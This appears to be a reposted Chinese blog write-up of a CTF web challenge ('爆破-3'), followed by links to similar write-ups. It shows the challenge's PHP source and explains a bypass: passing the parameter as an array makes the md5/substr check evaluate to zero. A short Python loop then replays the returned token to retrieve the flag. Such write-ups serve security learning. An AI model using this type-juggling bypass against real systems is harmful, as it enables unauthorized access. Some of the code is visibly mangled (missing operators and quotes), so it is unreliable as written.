[百度杯-二月场](Misc-Web)爆破-3

最新推荐文章于 2023-02-15 22:00:12 发布
最新推荐文章于 2023-02-15 22:00:12 发布
阅读量90 收藏 1
点赞数
原文链接:http://www.cnblogs.com/alyx/p/9217591.html
版权

<?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value $_REQUEST['value'];
$str_rand range('a''z');
$str_rands $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

 

 

重点就是这个判断语句if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0),可以发现这个whoami最开始是ea,然后当和value前两位相等时就变为另一个随机数,并输出,所以我们每次获取这个输出的随机数赋值给value就好,至于后半句,只要保证value为数组,substr就会失败,则等号成立。

 

 

 

import requests

url = "http://cdb71de019384d6dbd9acc73dd720d80e083270e01de4a31.game.ichunqiu.com/?value[]=ea"

s = requests.session()
r = s.get(url)
for i in range(15):
    url = http://cdb71de019384d6dbd9acc73dd720d80e083270e01de4a31.game.ichunqiu.com/?value[]=" + r.content[0:2]
    r = s.get(url)
 print r.content

转载于:https://www.cnblogs.com/alyx/p/9217591.html

weixin_33894992
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
百度”CTF比赛 十二月 - misc3-枯竭
Darenfy 随记
01-14 348
题目内容: 讲真的,才华已经枯竭 大家好好答题 也许这道题一点都不坑 也许。。。。。 附件下载 解题思路 确定文件类型,以及有文件加密 打开 010 查看是否是伪加密 到这里已经没有任何想法,一点意思也没有了呀 撑不住了,找 writeup 看完之后懵逼了,原来是脑洞爆破,我佛了 参考资料: “百度”CTF比赛 十二月misc3-枯竭 ...
misc web 爆破3
weixin_43345082的博客
08-16 294
i春秋的一道小题 打开就能看见源码 import requests import re url = "http://dd3f4319242241c9acfc17a3302f16713c03d93cb09145ef.changame.ichunqiu.com/?value[]=ea" s=requests.session() r = s.get(url).text print (r[0:2]) f...
i春秋CTF训练 Misc Web 爆破-2
椰奶冻不安全的博客
06-20 587
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:flag不在变量中。 链接需到ichunqiu网站申请 访问网页得到php代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 依旧是通过请求变量hello,再用var_dump()显示,可以考虑文件包含,在url请求flag.
MISC:压缩包取证(zip爆破、明文攻击、伪加密、CRC32碰撞)
小哈里的博客
09-19 1万+
爆破时我们所枚举的所有可能字符串的 CRC32 值是要与压缩源文件数据区中的 CRC32 值所对应。即使有时没有恢复密码,也可以使用明文攻击,最后点保存还是能得到压缩包里内容的。爆破:逐个尝试选定集合中的可以组成的所有密码,直到遇到正确的密码。我们去计算文件的 CRC32 值发现和上图中的 CRC32 值吻合。以及一个包含测试1的伪加密的压缩包(CRC32相同,>12字节),导入字典文件用字典中的密码进行破解(取决你的字典)推荐一个好用的6位的CRC32爆破工具。暴力枚举,跑字典,明文攻击,应有尽有。
百度” CTF比赛 九月 Web-爆破-3
qq_34106499的博客
01-16 284
1. php中session会话的启动及文件存储; 2. session数组的创建及使用; 3. md5()==0的数组绕过方法; 4. 简单的python脚本的编写。
CTF-MISC关于各类编码习题(湖工商扛把子)
03-17
3. Base64编码:Base64是一种用于将任意二进制数据转换为ASCII字符串的编码方式,以便在电子邮件等不支持二进制传输的环境中传输。在CTF中,Base64编码经常被用来隐藏或加密数据,参赛者需要解码才能获取原始信息。 ...
攻防世界miss-01,杂项misc太湖
11-01
标题 "攻防世界miss-01,杂项misc太湖" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界hit-the-core,杂项misc
11-01
攻防世界hit-the-core,杂项misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127626829
xorg-x11-fonts-misc-7.5-33.el9.noarch
07-04
xorg-x11-fonts-misc-7.5-33.el9.noarch
安恒-misc-附件资源
03-05
安恒-misc-附件资源
百度” 2017 二月 Misc Web 爆破-1
wyj_1216 House
04-15 261
题目 i春秋CTF题库 flag就在某六位变量中 writeup 知识点 $$ php中 $ 是可以叠加使用的 $$a = ${${a}} = ${b} = "Hello world!" 例如 : $a = "b"; $b = "Hello world!"; echo $$a; 就可以打印出 b 的值 “Hello world!” 超全局变量 $GLOBALS — 引用全局作用域中可用的全部...
ctfshow-misc-听说你喜欢爆破(详解 脚本 思路 全)
路baby的博客
02-15 1203
ctfshow-misc-听说你喜欢爆破(详解 脚本 思路 全) 第一层:outguess爆破 第二层:crc高宽爆破 第三层:MD5hash值爆破 第三层:MD5hash值爆破 第四层:kali中使用fcrackziprocky字典爆破 第五层:AOPR4位数字爆破 加油各位( •̀ ω •́ )y 期待与君再相逢
i春秋 百度”CTF比赛(二月Misc&&web题解 By Assassin
Assassin
03-16 2万+
学习web,搞起来! 百度”CTF比赛(二月)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
入坑CTF的第一篇CRC32爆破MISC
weixin_45616281的博客
11-18 5810
CRC32爆破
压缩包加密破解常见方法总结 CTF中Misc必备
闵行小鱼塘
11-23 2万+
对ctf中出现的压缩包加密破解方式做个总结:属性隐藏、看二进制、ZIP伪加密、暴力遍历、明文攻击、CRC32碰撞、进制转换隐藏信息、图片中隐藏压缩包
i春秋 CTF misc web爆破-3
一个潜心学习的小白
10-27 2020
题目提示:这个真的是爆破。 &lt;?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; ...
【安全攻防知识-4】CTF之MISC
热门推荐
qq_26579613的博客
03-24 3万+
1、MISC介绍 MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、压缩包解密、流量分析取证、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。 2、隐写术 隐写术包括图片、音频、视频等文件隐写,在处理这类问题时,应优先确认该文件的实际类型,可参考下图,查看其文件头信息。 常用以下工具: 1、010editor 查看文件类型 2、Binwalk 合并文件 3、Notepad++ 进行
i春秋CTF训练 Misc Web 爆破-1
椰奶冻不安全的博客
06-19 1115
Misc Web 爆破-1 题目内容:flag就在某六位变量中。 http://8007423c57e9409f94f941eac88ab2157ad7f90842f0497b.changame.ichunqiu.com:80 访问网页得到php代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);")
CTF之Misc基础考法及知识点
金 帛的博客
02-12 7188
CTF之Misc基础考法,对misc的一些常见考法的总结,还有kali的相关操作
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文).zip
最新发布
08-05
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值